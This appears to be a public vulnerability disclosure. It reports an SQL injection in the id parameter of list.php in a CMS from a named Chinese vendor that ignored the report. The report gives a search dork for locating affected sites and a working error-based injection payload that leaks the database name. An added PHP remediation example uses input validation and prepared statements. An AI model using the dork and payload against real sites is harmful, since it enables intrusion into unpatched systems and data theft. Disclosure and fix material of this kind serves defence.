Vulnerability Summary
Vulnerability Details
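Disclosure status:
2014-11-18: Actively contacting the vendor and waiting for the vendor to claim the report; details not made public
2015-02-16: The vendor has chosen to ignore the vulnerability; details disclosed to the public
Brief description:
As the title says~
UNION queries are supported~
Detailed description:
Technical support: 合众商道(大连)科技有限公司 inurl:list.php?id=
The id= parameter is not filtered.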
exp: list.php?id=2 AND (SELECT 5351 FROM(SELECT COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Proof of vulnerability:
Fix:
Filter the input.
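One way to apply this fix to the id parameter, as an added example (not code from the report or from the vendor's list.php): validate the value as an integer and bind it in a prepared statement. The articles table, the function names and the in-memory SQLite database are assumptions made so the script runs offline.

```php
<?php
declare(strict_types=1);
// Added example. The articles table, its columns and the function names are
// hypothetical; in-memory SQLite stands in for the site's MySQL database.
// Assumed vulnerable pattern (the report does not show list.php's source):
//   $sql = "SELECT id, title FROM articles WHERE id = " . $_GET['id'];

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false
    // so the server, not PHP, binds the parameter.
    $pdo->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO articles (id, title) VALUES (2, 'Constructed sample row')");
    return $pdo;
}

// Accept only a positive decimal integer; everything else is rejected.
function parse_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_article(PDO $pdo, $raw): ?array
{
    $id = parse_id($raw);
    if ($id === null) {
        return null; // answer 400/404 without touching the database
    }
    // The value travels as a typed parameter, never as SQL text.
    $stmt = $pdo->prepare('SELECT id, title FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = open_demo_db();
$inputs = [
    '2', // legitimate request
    // The value from the report's exp line:
    '2 AND (SELECT 5351 FROM(SELECT COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)',
];
foreach ($inputs as $raw) {
    $row = fetch_article($pdo, $raw);
    echo $row === null ? "rejected or not found\n" : "found: {$row['title']}\n";
}
```

The payload in the report also relies on the database error text reaching the HTTP response, so production pages should log database errors server-side and return a generic error page.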
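Copyright notice: when reposting, please credit the source 郭斯特@乌云
Vendor Response
Vendor reply:
Unable to contact the vendor, or the vendor actively refused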